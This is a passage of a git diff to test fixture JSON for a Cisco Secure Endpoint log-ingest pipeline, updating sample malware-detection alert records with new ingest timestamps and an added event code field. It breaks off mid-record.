                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":71000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542425\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533668103677542000",
@@ -2853,8 +2886,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853435305Z",
+                "ingested": "2021-09-30T00:14:30.174575965Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":532000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533667841684537000",
@@ -2938,8 +2972,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853437158Z",
+                "ingested": "2021-09-30T00:14:30.174578120Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":454000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667841684537366\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533667841684537000",
@@ -3027,8 +3062,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853438911Z",
+                "ingested": "2021-09-30T00:14:30.174580181Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":80000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537365\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533667841684537000",
@@ -3106,8 +3142,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853440635Z",
+                "ingested": "2021-09-30T00:14:30.174582214Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258118058508000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258118058508361\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6176258118058508000",
@@ -3191,8 +3228,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853442350Z",
+                "ingested": "2021-09-30T00:14:30.174584201Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667837389570000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":689000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667837389570068\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533667837389570000",
@@ -3270,8 +3308,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853444090Z",
+                "ingested": "2021-09-30T00:14:30.174586257Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258066518901000,\"timestamp\":1610705621,\"timestamp_nanoseconds\":608000000,\"date\":\"2021-01-15T10:13:41+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258066518900808\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6176258066518901000",
@@ -3349,8 +3388,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853445840Z",
+                "ingested": "2021-09-30T00:14:30.174588275Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258014979293000,\"timestamp\":1610705609,\"timestamp_nanoseconds\":581000000,\"date\":\"2021-01-15T10:13:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258014979293255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6176258014979293000",
@@ -3428,8 +3468,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853447569Z",
+                "ingested": "2021-09-30T00:14:30.174590339Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176257963439686000,\"timestamp\":1610705597,\"timestamp_nanoseconds\":569000000,\"date\":\"2021-01-15T10:13:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176257963439685702\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6176257963439686000",
@@ -3517,8 +3558,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853449311Z",
+                "ingested": "2021-09-30T00:14:30.174592404Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":778000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667579691532307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533667579691532000",
@@ -3602,8 +3644,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853451036Z",
+                "ingested": "2021-09-30T00:14:30.174594469Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":747000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532306\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533667579691532000",
@@ -3691,8 +3734,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853452763Z",
+                "ingested": "2021-09-30T00:14:30.174596504Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":371000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532305\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533667579691532000",
@@ -3776,8 +3820,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853454505Z",
+                "ingested": "2021-09-30T00:14:30.174598519Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667575396565000,\"timestamp\":1610705572,\"timestamp_nanoseconds\":971000000,\"date\":\"2021-01-15T10:12:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667575396565008\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533667575396565000",
diff --git a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log
similarity index 100%
rename from packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log
rename to packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log
diff --git a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json
similarity index 97%
rename from packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log-expected.json
rename to packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json
index 0bed9e11d9e..67524d16665 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log-expected.json
+++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json
@@ -38,8 +38,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:33.420916087Z",
+                "ingested": "2021-09-30T00:14:44.025200976Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6508397899087348000,\"timestamp\":1610659036,\"timestamp_nanoseconds\":295927133,\"date\":\"2021-01-14T21:17:16+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.6A37D750F0-100.SBX.TG\",\"detection_id\":\"6508397899087347713\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6508397899087348000",
@@ -116,8 +117,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:33.420920333Z",
+                "ingested": "2021-09-30T00:14:44.025206150Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14930696955218,\"timestamp\":1610656706,\"timestamp_nanoseconds\":844899579,\"date\":\"2021-01-14T20:38:26+00:00\",\"event_type\":\"Executed 